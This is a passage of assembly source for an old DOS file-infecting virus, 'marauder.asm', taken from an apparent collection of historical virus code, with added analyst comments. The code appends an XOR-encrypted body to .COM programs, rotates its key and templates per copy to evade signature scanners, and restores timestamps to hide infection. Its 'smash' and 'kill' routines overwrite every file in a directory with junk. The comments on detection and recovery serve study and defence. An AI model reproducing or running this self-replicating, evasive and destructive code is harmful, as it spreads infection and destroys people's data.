
📄 marauder.asm

📁 More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use
              xor     ch,ch
              int     21h

              mov     ah,3eh                    
              int     21h                       

; bad_file2 -- decide whether the directory scan goes on after a failure.
; NOTE(review): AX is treated as a DOS error code here; the call that set it
; is outside this view -- confirm against the first part of the listing.
bad_file2:
              cmp     ax, 05h                   ; DOS error 05h = access denied
              je      dumb                       
              cmp     ax, 02h                    ; DOS error 02h = file not found
              je      dumb                      
              mov     ah, 4fh                    ; any other case: select int 21h/4Fh (find next)
              jmp     searchloop                ; searchloop is defined outside this view
dumb:
              jmp     nofilesfound             ; stop scanning and take the exit path

; sick_of_it_all -- candidate filtering and construction of the 4-byte entry
; stub kept in newjmp. SI is used as the base for every data reference
; (presumably the run-time relocation delta -- it is set outside this view).
; Analyst note: newjmp is later written to offset 0 of the target (see the
; write under attach:), so a modified file starts with E9h, a 16-bit
; displacement equal to the low word of its original length minus 3, and the
; marker byte myid (value defined outside this view).
sick_of_it_all:

              cmp     word ptr [si + offset oldjmp], 5a4dh  ; 5A4Dh = bytes 'M','Z' (EXE header signature)
              je      bad_file                 ; EXE-format file: rejected (bad_file is outside this view)

              call    seekeof                  ; AX = low word of the file length

              cmp     ax,0010h                  ; shorter than 16 bytes ...
              jb      bad_file                   ; ... rejected
              cmp     ax, toolarge             ; toolarge is a constant defined outside this view
              jae     bad_file                   ; at or above the limit: rejected


              sub     ax,03h                     ; rel16 operand of a near JMP placed at offset 0 is target - 3
              mov     [si + newjmp + 2], ah  ; displacement, high byte
              mov     [si + newjmp+ 1], al       ; displacement, low byte
              mov     [si + newjmp + 3], myid    ; fourth byte = marker constant
              mov     ah, 0e9h                  ; E9h = opcode of JMP rel16
              mov     [si + newjmp], ah          

              xor     al,al                    
              mov     [si + donebefore], al     ; donebefore flag cleared (it is read outside this view)

              inc     word ptr [si + generation] ; per-copy generation counter

              mov      bp, si                    ; enc_enc addresses its data through BP
              call     enc_enc                   ; XOR pass with the key currently in mutantcode

; tryagain -- derive a new 16-bit key from the system clock and choose one of
; two code templates. Analyst note: because the key changes per copy and two
; template sets exist, a fixed byte pattern over the encoded region will not
; match every copy; the unencoded parts and the entry stub are the stable ones.
tryagain:
              mov      ah,2ch                  ; int 21h/2Ch: get system time
              int      21h                       ; returns DH = seconds, DL = hundredths
              cmp      dx, 0000h               
              je       tryagain                 ; a zero key would make the XOR a no-op; poll again
              mov      word ptr [si + offset enc_code], dx
                                                ; enc_code is defined outside this view

              mov     cl, 8                      
              ror     dx, cl                     ; rotate by 8 = swap DH and DL
              mov     word  ptr [si + offset mutantcode], dx ; key used by enc_enc

              cmp     dl, 30                    ; DL now holds the seconds value
              jng     encrypt_a                ; seconds <= 30: first template set
              jmp     encrypt_b                  ; otherwise: second template set


; encrypt_a -- copy the first template pair into the working slots:
; part1 -> part1_ (part1size bytes) and part2 -> done_ (part2size bytes).
; All five symbols are defined outside this view; BP is the data base.
encrypt_a:
             ;mov     bp, si                    

              lea     si,[bp + offset part1]     ; source: template part1
              lea     di,[bp + offset part1_]   ; destination slot
              mov     cx, part1size             ; byte count
              call    dostring                 ; rep movsb copy
              lea     si,[bp + offset part2]     ; source: template part2
              lea     di,[bp + offset done_]     ; destination slot

              mov     cx, part2size              
              call    dostring

              jmp     attach                    ; skip over the second template set

; encrypt_b -- same as encrypt_a but with the alternative pair:
; parta -> part1_ (part1size bytes) and partb -> done_ (part2size bytes).
; Falls through into attach. Symbols are defined outside this view.
encrypt_b:

              lea     si,[bp + offset parta]     ; source: alternative template a
              lea     di,[bp + offset part1_]   ; same destination slot as encrypt_a
              mov     cx, part1size            
              call    dostring                   ; rep movsb copy

              lea     si,[bp + offset partb]     ; source: alternative template b
              lea     di,[bp + offset done_]     
              mov     cx, part2size              
              call    dostring                  

; attach -- write the body and then the 4-byte entry stub to the open file.
; NOTE(review): the file position is presumably still at end-of-file from the
; earlier seekeof, and BX presumably still holds the handle -- neither is set
; in this block; confirm against the code outside this view.
; Analyst note: the file grows by (bodyend - bodystart + 5) bytes and its
; first four bytes are replaced, so a size/hash baseline detects the change.
attach:
              call    enc_enc                   ; XOR pass with the key chosen in tryagain

              mov     si,bp                     ; SI = data base again (SI/DI were used for copying)
              mov     ah,40h                    ; int 21h/40h: write to handle
              mov     cx, bodyend - bodystart    ; body length ...
              add     cx, 5                     ; ... plus 5 bytes (reason not visible in this view)
              lea     dx,[si + bodystart]        ; buffer = start of body
              call    infect                     ; defined outside this view; presumably issues the write
              jc      close_file               ; carry set = failure: skip the stub write
                                                 

              call    seektof                   ; file position = 0

              mov     ah,40h                     ; write ...
              mov     cx, 4                      ; ... 4 bytes ...
              lea     dx,[si + offset newjmp]    ; ... from newjmp (E9h, rel16, marker)
              int     21h                        

; close_file -- put the saved timestamp and attributes back and close the
; handle. Analyst note: because date, time and attributes are reset to the
; saved values, a directory listing shows no change in them; file length and
; content hashes are the reliable comparison points.
close_file:

              
              mov     ax,5701h                   ; int 21h/5701h: set file date and time
              mov     cx, word ptr [si + offset origtime] ; CX = saved time
              mov     dx, word ptr [si + offset origdate] ; DX = saved date
              mov     bx, word ptr [si + offset handle]   ; BX = saved file handle
              int     21h

              mov     ah, 3eh                   ; int 21h/3Eh: close handle in BX
              int     21h

              mov     ax,4301h                  ; int 21h/4301h: set file attributes
              mov     cx, word ptr [si + offset origattr] ; word read of a byte variable ...
              lea     dx, [si + offset dta + filename]    ; path = name field of the DTA copy
              xor     ch,ch                     ; ... so the stray high byte is cleared
              int     21h


; nofilesfound / restoredta -- exit path: undo the environment changes and
; hand control to the host program. Analyst note: the host's original first
; four bytes are put back in memory only, which is why the program appears to
; run normally while the file on disk stays modified.
nofilesfound:

              mov     ah, 03bh                   ; int 21h/3Bh: change current directory
              lea     dx, [si + offset drive]    ; path buffer defined outside this view;
              int     21h                       ; presumably the directory saved at start -- confirm

restoredta:
              mov     ah, 1ah                    ; int 21h/1Ah: set disk transfer address
              mov     dx, 080h                  ; DS:0080h, the default DTA inside the PSP
              int     21h

              push    si                        
              pop     bp                        ; BP = SI (data base)

              mov     ax, 2524h                  ; int 21h/25h, AL=24h: set critical-error vector
              lea     dx, [si + oint24]         ; DX = address of the oint24 variable
              int     21h                       

              lea     si,[bp + offset thisjmp]   ; source: saved first 4 bytes of the host
              mov     di,100h                   ; destination: entry point of a .COM image

              mov     cx,04h                     
              cld                               ; copy forwards
              rep     movsb                    

              mov     di, 0100h                  
              jmp     di                         ; continue in the host at CS:0100h

; smash -- destructive payload: enumerates every entry matching dwildcards
; ('*.*') in the current directory and passes each one to kill, which
; overwrites it. The condition that leads here is outside this view.
; In:  SI/BP = data base. Leaves through restoredta when the search ends.
smash         proc    near

              call    enc_enc                    ; XOR pass over the template region
              mov     ah, 4eh                    ; int 21h/4Eh: find first
              mov     cx, 07h                   ; attribute mask: read-only + hidden + system
              lea     dx, [si + offset dwildcards] ; search pattern '*.*'

r_loop:
              int     21h                       ; find first / find next
              jc      restoredta                 ; carry set: no (more) entries

              call    kill                      ; overwrite the entry just found

              mov     ah, 4fh                 ; int 21h/4Fh: find next
              jmp     r_loop

smash         endp

; dostring -- byte copy helper.
; In:  DS:SI = source, ES:DI = destination, CX = byte count.
; Out: SI and DI advanced past the copied bytes, CX = 0, direction flag clear.
dostring      proc    near

              cld                                ; copy towards higher addresses
              rep     movsb                     
              ret                              

dostring      endp


; enc_enc -- in-place XOR of total_mutant words starting at part1 with the
; 16-bit key stored at mutantcode. XOR is its own inverse, so calling it twice
; with the same key restores the bytes.
; In:  BP = data base. Out: SI = BP. Clobbers AX, CX, DI.
; NOTE(review): source and destination are the same offset, which only works
; in place if DS = ES (true for a .COM image unless changed elsewhere).
; Analyst note: mutantcode sits before bodyend, so the key appears to be
; carried inside each copy; the region can be decoded statically from it.
enc_enc       proc    near

              mov     si, bp                     
              add     si, offset part1           ; SI = start of the region
              mov     di, si                   ; DI = same address: transform in place
              mov     cx, total_mutant          ; word count (constant defined outside this view)

loop_xor:
              lodsw                              ; AX = next word
              xor     ax, [bp + mutantcode] ; apply the key
              stosw                              ; store it back
              loop    loop_xor

              mov     si, bp                    ; callers expect SI = data base on return
              ret

enc_enc       endp

; seektof -- move the file pointer to the start of the file.
; In:  BX = file handle (not set here). Out: DX:AX = new position, CF on error.
seektof       proc    near

              mov     ax,4200h                  ; int 21h/42h, AL=00h: seek from start
              xor     cx,cx                    ; CX:DX = offset 0
              xor     dx,dx                  
              int     21h                       

              ret

seektof       endp


; seekeof -- move the file pointer to the end of the file.
; In:  BX = file handle (not set here).
; Out: DX:AX = new position, i.e. the file length; CF on error.
seekeof       proc    near

              mov    ax,4202h                  ; int 21h/42h, AL=02h: seek from end
              xor    dx,dx                     ; CX:DX = offset 0
              xor    cx,cx
              int    21h

              ret

seekeof       endp


; openfile -- open the file named in the DTA copy for reading and writing.
; In:  SI = data base. Out: AX = handle, or CF set and AX = DOS error code.
openfile      proc    near

              mov    ax,3d02h                    ; int 21h/3Dh, AL=02h: open read/write
              lea    dx, [si + offset dta + filename] ; name field of the last search result
              int    21h                         

              ret

openfile      endp

; kill -- overwrite the file named in the DTA copy, starting at offset 0, with
; repeated copies of idbuffer (stringsize bytes each; both are defined
; outside this view). The record count is file length / stringsize.
; In:  SI = data base. Clobbers AX, BX, CX, DX.
; Analyst note: the content is replaced in place rather than deleted, so
; undelete-style recovery does not apply; affected files show the idbuffer
; pattern repeated from offset 0 and have to come back from backup.
kill          proc   near

              call   openfile                    ; open read/write
              jc     return                      ; open failed: leave this file alone
              mov    bx, ax                       ; BX = file handle

              push   bx                           ; BX is reused as the divisor below

              call   seekeof                      ; DX:AX = file length

              mov    bx, stringsize             
              div    bx                           ; AX = DX:AX / stringsize
              mov    cx, ax                    ; CX = number of records to write
              pop    bx                          ; BX = file handle again
              push   cx                           ; keep the count across seektof

              call   seektof                     ; file position = 0
              pop    cx


loop_:
              push   cx                           ; CX doubles as the byte count below
              mov    ah, 40h                      ; int 21h/40h: write to handle
              mov    cx, stringsize               
              lea    dx, [si + offset idbuffer]  ; buffer written on every pass
              int    21h
              jc     ender                       ; write error: stop
              pop    cx
              dec    cx
              jcxz   ender                       ; count exhausted
              jmp    loop_
ender:

              mov    ah, 3eh                     ; int 21h/3Eh: close handle in BX
              int    21h                       

return:
              ret

kill          endp


; Working data. Everything here lies before bodyend, i.e. inside the range
; bodystart..bodyend that attach writes out, so these values travel with each
; copy. All references go through the SI/BP base register.
filespec      db      '*.COM',0                  ; search pattern; its use is outside this view
dwildcards    db      '*.*',0                  ; search pattern used by smash
rootdir       db      '..',0                     ; parent-directory path; its use is outside this view
generation    dw      0000                       ; counter incremented in sick_of_it_all
origdate      dw      ?                         ; saved file date, restored in close_file
origtime      dw      ?                          ; saved file time, restored in close_file
origattr      db      ?                          ; saved attribute byte, restored in close_file
handle        dw      ?                          ; saved file handle, reloaded in close_file
defaultdrive  db      ?                          ; not referenced in this view
oldjmp        db      09h, 0cdh, 020h, 90h       ; 4-byte buffer tested for 'MZ'; CDh 20h encodes INT 20h, 90h is NOP
thisjmp       db      4 dup (?)                  ; 4 bytes copied to 0100h before the jump to the host
newjmp        db      4 dup (?)                  ; entry stub written to file offset 0: E9h, rel16, marker
mutantcode    dw      0000                       ; 16-bit XOR key used by enc_enc
donebefore    db      00                         ; flag cleared in sick_of_it_all; read outside this view
oint24        dd      00                         ; presumably the saved int 24h vector -- the save is outside this view

bodyend:                                         ; end marker used in the length written by attach

; not encrypted

; newint24 -- replacement critical-error (int 24h) handler. Returning AL = 0
; tells DOS to ignore the error, so no "Abort, Retry, Fail?" prompt is shown
; (for example on a write-protected disk). Where it is installed is outside
; this view.
newint24:
              xor     al,al                     ; AL = 0: ignore the error
              iret                               
endcode:

code          ends
              end    headstart                  ; program entry label, defined outside this view

